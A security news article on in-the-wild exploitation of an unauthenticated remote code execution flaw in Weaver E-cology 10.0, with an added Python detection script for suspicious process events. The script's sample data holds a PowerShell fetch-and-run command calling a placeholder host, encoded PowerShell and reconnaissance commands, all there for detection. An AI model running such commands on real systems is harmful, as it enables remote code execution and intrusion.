Weaver E-cology Bug Exploited Since March

A critical Weaver E-cology flaw tied to CVE-2026-22679 was reportedly exploited in attacks starting mid-March, with fixes released shortly after.
A critical vulnerability in the Weaver E-cology office automation platform has been actively exploited in the wild since mid-March, allowing attackers to run commands on affected servers.
Misryoum reports that the issue, tracked as CVE-2026-22679, is an unauthenticated remote code execution (RCE) flaw impacting E-cology 10.0 builds released prior to March 12. The bug stems from an exposed debug API endpoint that can accept user-controlled parameters and route them into backend functionality without proper authentication or safeguards, effectively turning that endpoint into a remote command execution interface.
In this context, the timing is especially worrying: attacks are said to have begun only about five days after a security update was released by the vendor, yet roughly two weeks before the vulnerability details were publicly disclosed. According to Misryoum, researchers documented activity spanning around a week and described it as unfolding in multiple distinct phases.
Weaver E-cology is an enterprise office automation and collaboration suite used for workflows, document management, HR, and other internal business processes, with adoption reported primarily among Chinese organizations. The attackers’ early steps reportedly focused on confirming RCE behavior by triggering test commands through a Java-linked callback, before attempting payload delivery through PowerShell-based approaches. Some attempts were blocked by endpoint defenses, and at least one installer-based approach reportedly failed to execute as intended.
After those setbacks, the activity reportedly shifted back toward the vulnerable endpoint, with Misryoum noting the use of obfuscated and fileless PowerShell to repeatedly retrieve remote scripts. Across the observed phases, attackers also carried out reconnaissance, including commands commonly used to identify the current user and host configuration and to list running processes.
Insight: Even when attackers cannot fully complete their payload chain, an RCE path can still be enough to support reconnaissance and probing, which often sets the stage for later, more damaging intrusions.
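As an added example (not code from the report, the vendor, or the researchers), the following Python triages constructed process-creation events for the behavior described above: a Java web-application process spawning a shell, encoded or fileless PowerShell fetching remote scripts, and basic host reconnaissance. The process names, tag names, sample command lines, placeholder base64 and URL are all assumptions for illustration.

```python
import re

# Constructed process-creation events (parent image, child image, command line).
# None of these are taken from the report; the base64 and URL are placeholders.
SAMPLE_EVENTS = [
    ("java.exe", "cmd.exe", "cmd.exe /c whoami"),
    ("java.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc QUJDRA=="),
    ("java.exe", "powershell.exe",
     "powershell.exe -c \"IEX (New-Object Net.WebClient).DownloadString('http://placeholder.invalid/s.ps1')\""),
    ("explorer.exe", "powershell.exe", "powershell.exe -File C:\\scripts\\backup.ps1"),
    ("java.exe", "tasklist.exe", "tasklist /v"),
]

WEB_APP_PARENTS = {"java.exe", "javaw.exe"}          # assumed: a Java-based web application server
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
RECON_CMDS = {"whoami", "hostname", "systeminfo", "ipconfig", "tasklist"}
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|en|enc|encodedcommand)\s+[A-Za-z0-9+/=]{8,}")
FILELESS_HINTS = re.compile(
    r"(?i)downloadstring|downloadfile|invoke-webrequest|invoke-expression|\biex\b|net\.webclient|-nop\b|-w(?:indowstyle)?\s+hidden")

def _tokens(cmdline):
    """Yield lower-cased basenames of each command-line token, minus any .exe suffix."""
    for tok in cmdline.split():
        tok = tok.strip("\"'").lower().rsplit("\\", 1)[-1]
        yield tok[:-4] if tok.endswith(".exe") else tok

def classify(parent, child, cmdline):
    """Tag one process-creation event and assign a triage severity (or None)."""
    parent, child = parent.lower(), child.lower()
    tags = []
    web_parent = parent in WEB_APP_PARENTS
    if web_parent and child in SHELLS:
        tags.append("web_process_spawned_shell")        # typical footprint of web-app RCE
    if child in {"powershell.exe", "pwsh.exe"}:
        if ENCODED_FLAG.search(cmdline):
            tags.append("encoded_powershell")
        if FILELESS_HINTS.search(cmdline):
            tags.append("fileless_ps_indicators")       # in-memory fetch/execute of remote scripts
    if web_parent and RECON_CMDS & set(_tokens(cmdline)):
        tags.append("recon_from_web_process")
    if web_parent and {"encoded_powershell", "fileless_ps_indicators"} & set(tags):
        severity = "high"
    elif web_parent and tags:
        severity = "medium"
    elif tags:
        severity = "low"
    else:
        severity = None
    return {"severity": severity, "tags": tags, "cmdline": cmdline}

def triage(events):
    """Return only the events that earned a severity, in input order."""
    return [r for r in (classify(*e) for e in events) if r["severity"]]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["severity"], ",".join(f["tags"]), "|", f["cmdline"])
```

In practice the parent-process allowlist and recon list would be tuned to the host's actual application server and baseline, since a shell spawned by the web process is the strongest single signal here.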
A key detail highlighted in Misryoum’s reporting is that the malicious operations did not establish a persistent session on targeted hosts. In addition, the vendor’s fix for the problem reportedly removes the exposed debug endpoint entirely, with updated builds referenced as addressing the issue.
Misryoum says there are no alternative mitigations or workarounds outlined in the official guidance, leaving system upgrades as the primary recommendation. Organizations running the affected E-cology 10.0 builds should apply the available security updates as soon as possible.
Insight: For defenders, this case is a reminder that even “debug” functionality can become a high-risk attack surface if it is reachable without authentication and lacks strict input handling.